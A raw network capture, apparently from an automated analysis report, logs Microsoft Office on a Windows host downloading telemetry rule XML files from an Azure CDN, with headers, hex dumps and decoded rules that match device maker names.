                                                                                                                                                                          x-azure-ref: 20241123T180140Z-15b8b599d88f9wfchC1TEBm2kc00000003g000000000251c
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:40 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          37192.168.2.54974413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:40 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:40 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                          x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180140Z-174c587ffdfldtt2hC1TEBwv9c000000034000000000a4mt
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:40 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          38192.168.2.54974713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:40 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:40 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                          x-ms-request-id: 15a67567-d01e-0066-07eb-3bea17000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180140Z-15b8b599d889gj5whC1TEBfyk000000002zg00000000nym4
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          39192.168.2.54974813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:40 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:40 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                                                                          x-ms-request-id: 3af7945d-501e-0016-1564-3b181b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180140Z-178bfbc474btrnf9hC1NYCb80g0000000520000000000wt9
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:41 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          40192.168.2.54974913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:42 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:42 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                          x-ms-request-id: df8835e2-601e-0002-5b4e-3ca786000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180142Z-15b8b599d88l2dpthC1TEBmzr0000000035000000000h666
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:43 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          41192.168.2.54975113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:42 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:43 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                                                                          x-ms-request-id: 3c6e4b4f-901e-005b-7308-3d2005000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180143Z-178bfbc474b7cbwqhC1NYC8z4n00000004qg00000000cmf2
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          42192.168.2.54975013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:42 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:43 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                                                                          x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180143Z-178bfbc474bnwsh4hC1NYC2ubs00000004tg00000000hyvy
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:43 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          43192.168.2.54975213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:42 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:43 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                                                                          x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180143Z-178bfbc474btrnf9hC1NYCb80g00000004xg00000000e07x
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:43 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          44192.168.2.54975313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:42 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:43 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 423
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                          x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180143Z-174c587ffdf89smkhC1TEB697s00000003ag00000000dkud
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:43 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          45192.168.2.54975413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:45 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:45 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 478
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                                                                          x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180145Z-178bfbc474bscnbchC1NYCe7eg0000000510000000003xrc
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:45 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          46192.168.2.54975513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:45 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:45 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
